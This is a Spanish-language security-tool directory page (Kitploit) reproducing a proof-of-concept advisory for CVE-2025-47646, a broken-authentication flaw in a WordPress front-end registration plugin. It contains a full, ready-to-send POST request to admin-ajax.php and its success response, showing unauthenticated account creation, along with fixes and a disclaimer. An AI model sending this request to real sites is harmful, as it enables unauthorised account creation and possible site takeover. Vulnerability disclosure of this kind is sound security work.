Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-47646 — WordPress PSW Front-end Login &amp; Registration Plugin <= 1.12 es vulnerable a Autenticación Rota | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-47646
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónAprendizaje y Educación
GitHubnxploited/cve-2025-47646

CVE-2025-47646

WordPress PSW Front-end Login &amp; Registration Plugin <= 1.12 es vulnerable a Autenticación Rota

Ver Repositorio
21hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔐 CVE-2025-47646 – Inicio de sesión y registro front-end de PSW <= 1.12

📌 Información del plugin

  • Plugin: PSW Front-end Login & Registration
  • Versión vulnerable: <= 1.12
  • CVE: CVE-2025-47646
  • Gravedad: Alta (CVSS 9.8)
  • Tipo de vulnerabilidad: Autenticación rota
  • Privilegio requerido: No autenticado
  • Parcheado: ❌ No hay solución oficial disponible
  • Prioridad del parche: 🔴 Alta
  • Fecha de publicación: 08 de mayo de 2025

⚠️ Resumen de la vulnerabilidad

Este plugin expone una falla crítica en su mecanismo de registro.
Si bien ofrece un formulario de registro front-end basado en shortcode ([psw_registration]), no aplica restricciones de rol adecuadas ni una validación segura.

Los atacantes pueden explotar este mecanismo para crear cuentas sin autenticación y, si el default_role del sitio está mal configurado (por ejemplo, establecido como administrator), puede ocurrir una escalada completa de privilegios.


🧪 Prueba de concepto (PoC)

✅ Endpoint objetivo:

root@kitploit:~
POST /wordpress/wp-admin/admin-ajax.php

📥 Solicitud (por ejemplo, mediante Burp Suite o curl):

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1

Host: {Host}

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 233

Origin: {Host}

Connection: keep-alive

Cookie:

Priority: u=0



first_name=nxploited&last_name=nxploited&new_user_name=nxpl3432oited&new_user_email=NxploitBot%40gmail.com&new_user_password=admin&new_user_password_confirmation=admin&action=register_user_front_end&psw_form=75a32ef38d

psw_form es el campo nonce requerido para que la solicitud pase.
Este nonce se genera dinámicamente a partir del shortcode [psw_registration] en el front-end.


✅ Respuesta exitosa

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<h4>Hello nxploited nxploited</h4>
<p>Thanks for creating an account on our website. Please check your email for activation link...</p>

🛠️ ¿Dónde está la falla?

  • El plugin permite acceso AJAX no autenticado a register_user_front_end
  • Respeta la configuración default_role de WordPress para asignar roles de usuario
  • Si está mal configurado (administrator), el atacante obtiene acceso completo
  • No hay aplicación de roles ni validación codificada en la lógica del plugin

💬 Explicación del shortcode

Para exponer el formulario de registro y generar un nonce válido para psw_form, se utiliza el siguiente shortcode:

root@kitploit:~
[psw_registration]

Esto renderiza un formulario de registro que incluye el campo nonce oculto necesario para que la llamada AJAX tenga éxito.


🔐 Recomendación

  • Restringir el registro AJAX no autenticado
  • Aplicar asignaciones de roles del lado del servidor
  • Monitorear y fijar default_role a un valor seguro (por ejemplo, subscriber)
  • Aplicar parche virtual si no hay actualización disponible

⚠️ Aviso legal

Este informe es únicamente con fines educativos y de pruebas de seguridad autorizadas.
La explotación de esta vulnerabilidad sin permiso puede violar límites legales y éticos.


NXploited (Khaled_Alenazi)

Descargar herramienta